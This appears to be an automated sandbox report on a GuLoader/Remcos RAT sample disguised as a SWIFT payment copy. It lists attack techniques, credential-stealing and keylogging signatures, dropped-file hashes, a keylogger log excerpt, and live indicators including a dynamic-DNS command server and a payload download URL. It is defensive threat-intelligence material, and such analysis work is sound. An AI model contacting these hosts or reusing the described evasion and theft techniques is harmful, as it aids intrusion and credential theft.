| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 112 Process Injection | 1 Software Packing | 2 Credentials in Registry | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | 1 Credentials In Files | 128 System Information Discovery | Distributed Component Object Model | 11 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Masquerading | LSA Secrets | 331 Security Software Discovery | SSH | 2 Clipboard Data | 213 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 12 Virtualization/Sandbox Evasion | Cached Domain Credentials | 12 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 112 Process Injection | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
Behavior Graph ID: 1586058. Sample: z58Swiftcopy_MT.bat.exe. Startdate: 08/01/2025. Architecture: WINDOWS. Score: 100.

Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 6 other signatures.
Sample-level DNS/IP: wealthabundance01.duckdns.org (Uses dynamic DNS services); teldrum.ro; geoplugin.net.

Process: z58Swiftcopy_MT.bat.exe (started)
    Dropped: C:\Users\user\AppData\Local\...\nsm9317.tmp, data
    Dropped: C:\Users\user\AppData\...\Objektsprogs.Jrg119, data
    Dropped: C:\Users\user\AppData\Local\...\System.dll, PE32
    Signatures: Detected unpacking (changes PE section rights); Tries to steal Mail credentials (via file registry); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 2 other signatures

    Process: z58Swiftcopy_MT.bat.exe (started)
        DNS/IP: wealthabundance01.duckdns.org 43.226.229.196, 3981, 49748, 49749 SOFTLAYERUS Hong Kong
        DNS/IP: teldrum.ro 109.99.162.14, 443, 49747 RTDBucharestRomaniaRO Romania
        DNS/IP: geoplugin.net 178.237.33.50, 49750, 80 ATOM86-ASATOM86NL Netherlands
        Dropped: C:\ProgramData\remcos\logs.dat, data
        Signatures: Tries to detect Any.run; Maps a DLL or memory area into another process; Installs a global keyboard hook

        Process: z58Swiftcopy_MT.bat.exe (started)
            Signatures: Tries to steal Instant Messenger accounts or passwords; Tries to harvest and steal browser information (history, passwords, etc)
        Process: z58Swiftcopy_MT.bat.exe (started)
            Signatures: Tries to steal Mail credentials (via file / registry access)
        Process: z58Swiftcopy_MT.bat.exe (started)

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| z58Swiftcopy_MT.bat.exe | 21% | ReversingLabs | Win32.Trojan.Sonbokli | |
| z58Swiftcopy_MT.bat.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\nsb9327.tmp\System.dll | 0% | ReversingLabs | | |

No Antivirus matches
No Antivirus matches

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://www.gopher.ftp://ftp. | 0% | Avira URL Cloud | safe | |
| http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference. | 0% | Avira URL Cloud | safe | |
| wealthabundance01.duckdns.org | 0% | Avira URL Cloud | safe | |
| http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe | |
| http://ocsp.sca1b.amazontrust.com06 | 0% | Avira URL Cloud | safe | |
| http://ocsp.rootca1.amazontrust.com0: | 0% | Avira URL Cloud | safe | |
| https://teldrum.ro/PmprpeY34.bin0Pf | 0% | Avira URL Cloud | safe | |
| http://www.imvu.comr | 0% | Avira URL Cloud | safe | |
| http://nsis.sf.net/NSIS_Error | 0% | Avira URL Cloud | safe | |
| http://www.imvu.comata | 0% | Avira URL Cloud | safe | |
| https://teldrum.ro/PmprpeY34.bin | 0% | Avira URL Cloud | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| wealthabundance01.duckdns.org | 43.226.229.196 | true | true | | unknown |
| geoplugin.net | 178.237.33.50 | true | false | | high |
| teldrum.ro | 109.99.162.14 | true | false | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| wealthabundance01.duckdns.org | true | Avira URL Cloud: safe | unknown |
| https://teldrum.ro/PmprpeY34.bin | false | Avira URL Cloud: safe | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                    unknown
                                                                                                                                                    https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QUZEbhvD739.tmp.3.drfalse
                                                                                                                                                      high
                                                                                                                                                      http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl0bhvD739.tmp.3.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://csp.withgoogle.com/csp/report-to/adspam-signals-scsbhvD739.tmp.3.drfalse
                                                                                                                                                          high
                                                                                                                                                          http://pki.goog/repo/certs/gts1c3.der07bhvD739.tmp.3.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-TEB31r4b&bhvD739.tmp.3.drfalse
                                                                                                                                                              high
                                                                                                                                                              http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdz58Swiftcopy_MT.bat.exe, 00000002.00000001.27691456198.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475198040.0000000002A91000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2bhvD739.tmp.3.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://srtb.msn.com/auction?a=de-ch&b=bba24733ba4a487f8f8706bf3811269e&c=MSN&d=https%3A%2F%2Fwww.msbhvD739.tmp.3.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://c.pki.goog/r/r1.crl0bhvD739.tmp.3.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?subset_id=2&fvd=n4&v=3bhvD739.tmp.3.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.msn.com/de-ch/?ocid=iehpbhvD739.tmp.3.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://account.live.com/Resources/images/AppCentipede/AppCentipede_Microsoft_HFeToeM4u6fzMQF_f_rQ5QbhvD739.tmp.3.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914bhvD739.tmp.3.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://static.doubleclick.net/dynamic/5/283983386/11928812572019506176_2845462151855228713.jpegbhvD739.tmp.3.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregulabhvD739.tmp.3.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1bhvD739.tmp.3.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCefb91313fdae420ebbea45d8f044894bhvD739.tmp.3.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://account.live.com/identity/confirm?mkt=EN-US&uiflavor=win10host&client_id=1E0000480728C5&connbhvD739.tmp.3.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://dsm09prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?8f6ec558c7d1c621e0d5881446d586b0bhvD739.tmp.3.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475198040.0000000002A91000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://www.google.com/pagead/drt/uiz58Swiftcopy_MT.bat.exe, 00000003.00000003.28478173593.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28477694523.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28477629885.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478024679.0000000002279000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://account.live.com/Resources/images/Arrows/left_qcwoJO81F7bEFg3Pj_fUEA2.svgbhvD739.tmp.3.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://acctcdn.msftauth.net/jqueryshim_hlu0tTfjWJFWYNt1WZrVqg2.js?v=1bhvD739.tmp.3.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://pki.goog/gsr1/gsr1.crt02bhvD739.tmp.3.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://pki.goog/repo/certs/gts1c3.der0$bhvD739.tmp.3.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                          • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
109.99.162.14 | teldrum.ro | Romania | 9050 | RTDBucharestRomaniaRO | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
43.226.229.196 | wealthabundance01.duckdns.org | Hong Kong | 36351 | SOFTLAYERUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1586058
Start date and time: 2025-01-08 17:08:47 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 15m 29s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: z58Swiftcopy_MT.bat.exe
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.winEXE@9/12@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 171
• Number of non-executed functions: 323
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe
• Excluded IPs from analysis (whitelisted): 52.113.194.132
• Excluded domains from analysis (whitelisted): ecs.office.com, ctldl.windowsupdate.com
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: z58Swiftcopy_MT.bat.exe
Time | Type | Description
11:13:46 | API Interceptor | 24348582x Sleep call for process: z58Swiftcopy_MT.bat.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
109.99.162.14 | DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe | malicious | Remcos, GuLoader |
109.99.162.14 | DHL_119040 receipt document,pdf.exe | malicious | AgentTesla |
109.99.162.14 | SecuriteInfo.com.W32.MSIL_Kryptik.HRZ.genEldorado.12789.exe | malicious | AgentTesla |
109.99.162.14 | SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe | malicious | AgentTesla |
178.237.33.50 | 173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 1736348224ad77cf86e491faad27e4b5decf1eb0bb26f16b0527e5ef488389ba353aa3db79582.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 1736348224f7603a5c535b2b2f6cc29730626d73a967c67551d2d14f73b547fe7b5fc10393994.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 1736348224bd83df4c8d79407f8e7ac5cf8c08b59746ce37ff95772daa0a6283b50e2b0882115.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 17363482249a873460757a9239193679567953c11d17b898ff9845034e34f5d2e7f4521342673.dat-decoded.exe | malicious | Remcos
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  RailProvides_nopump.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
Match: C:\Users\user\AppData\Local\Temp\nsb9327.tmp\System.dll
Associated Sample Name / URL | Detection | Threat Name
DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe | malicious | Remcos, GuLoader
DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe | malicious | GuLoader
asXlZG3aW6.exe | malicious | Remcos, GuLoader
asXlZG3aW6.exe | malicious | GuLoader
aMfizaMilo.exe | malicious | GuLoader
1ppvR5VRT6.exe | malicious | GuLoader
Ozb8aojWew.exe | malicious | GuLoader
aMfizaMilo.exe | malicious | GuLoader
1ppvR5VRT6.exe | malicious | GuLoader
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):320
                                                                                                                                                                                                                                    Entropy (8bit):3.4378871152755335
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6:Mlsr5YcIeeDAlOWA7DxbN2fxlPym0wiDxbN2fofCm0v:tzec0WItN2LPyy4tN2WCl
                                                                                                                                                                                                                                    MD5:2D7FCA8DCCE94488B6FC7808F056C469
                                                                                                                                                                                                                                    SHA1:343B454C4836F8CE6D2258530704BBF5C70A27BB
                                                                                                                                                                                                                                    SHA-256:B2AA126953CA5603CF08A938B3CFEDC9C6E79A754C878146F6B30FDE8A6A5642
                                                                                                                                                                                                                                    SHA-512:1E0E29763291ABCDFF5671A73DEA374EC36B4D30225984FCAE8E7C7596143CD314A6B67D28C48E1DB5D3B1830580723977695EDB3421381FAF10F21C05C325CD
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                                                                                                                    Reputation:low
Preview:[2025/01/08 11:13:14 Offline Keylogger Started] [Program Manager] { User has been idle for 70967 minutes } { User has been idle for 67764 minutes }
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):963
                                                                                                                                                                                                                                    Entropy (8bit):4.998809565203531
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:tkBUMnd6CsGkMyGWKyGXPVGArwY3bMJma5HZJmGRArpv/mOAaNO+ao9W7iN5zzkR:qDdRNuKyGX85MvXhNlT3/7HAhYro
                                                                                                                                                                                                                                    MD5:FCDA5CEB9375B32B8071A0A1480863E4
                                                                                                                                                                                                                                    SHA1:BB7D14116E1F84F6AEA6BA45C660B8BB3E4659D2
                                                                                                                                                                                                                                    SHA-256:2CBF397584AC28F3810A02A7AD3C6604451C014632BF4D9F73A063C4E40DC18E
                                                                                                                                                                                                                                    SHA-512:4FDB3A7BC06185B1C9344A1F35322FA699E447FE242F33FF50EE79CB4EB451BC71F98D6F90FC50A6CDC2A82F2A7E752F583B387DE5CFA999C722FC73949A9232
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Preview:{. "geoplugin_request":"185.246.209.154",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Chicago",. "geoplugin_region":"Illinois",. "geoplugin_regionCode":"IL",. "geoplugin_regionName":"Illinois",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"602",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"41.871",. "geoplugin_longitude":"-87.6289",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):295063
                                                                                                                                                                                                                                    Entropy (8bit):7.644482175354666
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6144:8lhRMF3vOZjQKTUTDlWKY8Q+7T0oXvtFecJpwfFRWUEj2:8Nc3viuD8H89H0cDecJ4RWUEa
                                                                                                                                                                                                                                    MD5:0C64C6AD5E6D9DC0871FE1A8C4CC04FA
                                                                                                                                                                                                                                    SHA1:886C9CA43763723A11E783223BA019513272F984
                                                                                                                                                                                                                                    SHA-256:1B756A1D8819907BBA34B116F01FB92BC5FBF1A833635CD6401E9AC4F10EFEA2
                                                                                                                                                                                                                                    SHA-512:25E5A279BDEF2BDB15B068D590B3DD372479E67D1B7EEFD02CB8ECEF4C7C567939BBADFD43F657DE37431A8FAA6EC252A6AB114BFD196B1ED184553591D29D10
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne\Objektsprogs.Jrg119, Author: Joe Security
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):126219
                                                                                                                                                                                                                                    Entropy (8bit):1.2476140630029537
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:ypw+1R1HmrJqSpqHt8wu/Uc8A82XMK80Wnseb5duoe2njOg5X/G7:yEpmwKm
                                                                                                                                                                                                                                    MD5:BE1AEA45CD04BE1806BE5777F6529ECE
                                                                                                                                                                                                                                    SHA1:B3E4893ADB16D8677032B9B8C3B419FB6F9040D2
                                                                                                                                                                                                                                    SHA-256:34DDE02E575CF514C32DF1108FB8D83E22831B5A13733793C7B00C1B119320DE
                                                                                                                                                                                                                                    SHA-512:9649E9AB3AB9C3290E118E4E8F4354B067259B96E06753E9F1EC97AD4A5A41EE3438411D0166B7F390EA41489629D8338AF00FAB7964C5C91EEDE4978AFC7FC8
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:Matlab v4 mat-file (little endian) \233, numeric, rows 5376, columns 0, imaginary
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):114357
                                                                                                                                                                                                                                    Entropy (8bit):4.581842620745206
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:O+uWUcEcdeZGLztlmGkJRPF9qHUziwsvm7jvKLPubEGgNRCT3JuvD2AXRY1xo9DV:b/bwstl7EdYHdwr72zKaCZuxSA9DV
                                                                                                                                                                                                                                    MD5:CA8C7BC5806A696930B9F4195B6DD4A1
                                                                                                                                                                                                                                    SHA1:E7F93E666F8428FB51D2B5DEEC20BFCD6292A524
                                                                                                                                                                                                                                    SHA-256:E2CAB223B5AE152BF8BCE3F995D45A1412F3F4B63F15A65F62B9DDBC234605AC
                                                                                                                                                                                                                                    SHA-512:7F2CB68FA4B545845A1BD3A813C51B01286F4F3A3532669317D47463289699E1C605A18AF719C9CF5046A3CC47337F1F069CEA90406342D84FDF618DF23AF4A2
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):37896
                                                                                                                                                                                                                                    Entropy (8bit):1.200616357643719
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:GGByFFg5xUFtU4WnCLunXiPBK+34PvQ27JnTpFsxxa:GGByFFg5xU/U4WsunXiE+3gvQ2fFsxxa
                                                                                                                                                                                                                                    MD5:0B216F5A8151B9C6EB9AD7F89A9BC030
                                                                                                                                                                                                                                    SHA1:3F34D9DFA023843C1B66155ADD4E5C311F07DCA0
                                                                                                                                                                                                                                    SHA-256:FD8DE6BF1B5A69687911C500A12D5BA3092569611844CDED241563AB9E611A32
                                                                                                                                                                                                                                    SHA-512:EFB2C8919AF7A0D618085DF35557CDAA59C350FDFE617A5F18BFA449AD09B105DC3CA8F4467C69763CD2AEBB376F8122FF7116B9D3DE85391E3462C2FD59966A
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):214335
                                                                                                                                                                                                                                    Entropy (8bit):1.2476323095361204
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:99C7iXwL7CwdtIlUUoJOtkhmD6bddfwlR6eng3tDfGXU41X8Kbfjl+f7KoZ3pkmY:eiRa7POSx67/L
                                                                                                                                                                                                                                    MD5:59874EF8405969406DE4B3A1C90793D4
                                                                                                                                                                                                                                    SHA1:C3A8B546FA78D9218E8355756B12921E6419E69E
                                                                                                                                                                                                                                    SHA-256:24F7B3739548CFA16CB005CD467F26C369EBCA40B4867C197BF4A90DD8939079
                                                                                                                                                                                                                                    SHA-512:F6BC59CC92DD6660662193A49D2C1023DC42141948E9361CB6FA122BA796FE2175C9A3CF68F4318BA728315DD1BCBAE0DB925C03D6EED8540C4FB5A961E7BEE9
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):25
                                                                                                                                                                                                                                    Entropy (8bit):4.0536606896881855
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:8+dB4WYiTNvn:8AbYiTNvn
                                                                                                                                                                                                                                    MD5:08CA75DA54EB4810D18796C97F510A55
                                                                                                                                                                                                                                    SHA1:3D9B020193D16E7D0F5392EF7693A6C5C6D2531D
                                                                                                                                                                                                                                    SHA-256:E628D2EE9FE054256B42FFDEC449254437949DEB45B13354D515579CE3E0618E
                                                                                                                                                                                                                                    SHA-512:46D71D69FDCBF9069E74C1176080637A1356E747FA1A1C852172CF0BB36F44ED7D741EB6DF029F333D690E500462DFC9EDEB8B4EB7BB9642C907B792F30DED9A
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:[Bus Clock]..Gats=Galse..
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb574f9db, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):41943040
                                                                                                                                                                                                                                    Entropy (8bit):1.414839785096139
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:KmzLCQZLtPb9Mk+M/aGyptmVjPDQgGEQg9jZkoiGsS7dID7ILJvCdau2u0lfoBg:XLN9lnaGyp6PDQgGT2u2
                                                                                                                                                                                                                                    MD5:0ACC78E34DB8E23FCBA8E429EC8B64E6
                                                                                                                                                                                                                                    SHA1:8623FC362C67D29D455CF957C70D57682EDD5B78
                                                                                                                                                                                                                                    SHA-256:EA0E9493CD20DEC887436323FC8C93855507CD77286A8ABB4AD646F604215D7C
                                                                                                                                                                                                                                    SHA-512:46095667ECB07CE94DD2EF3B15216D0B18CD9F8A13D7D5874F63E45051868941CFE0C4D5789F631B51D46639F0071921CB6A9FE1680E0517ADDD9B91413C3B33
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Qn:Qn
                                                                                                                                                                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:..
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):11264
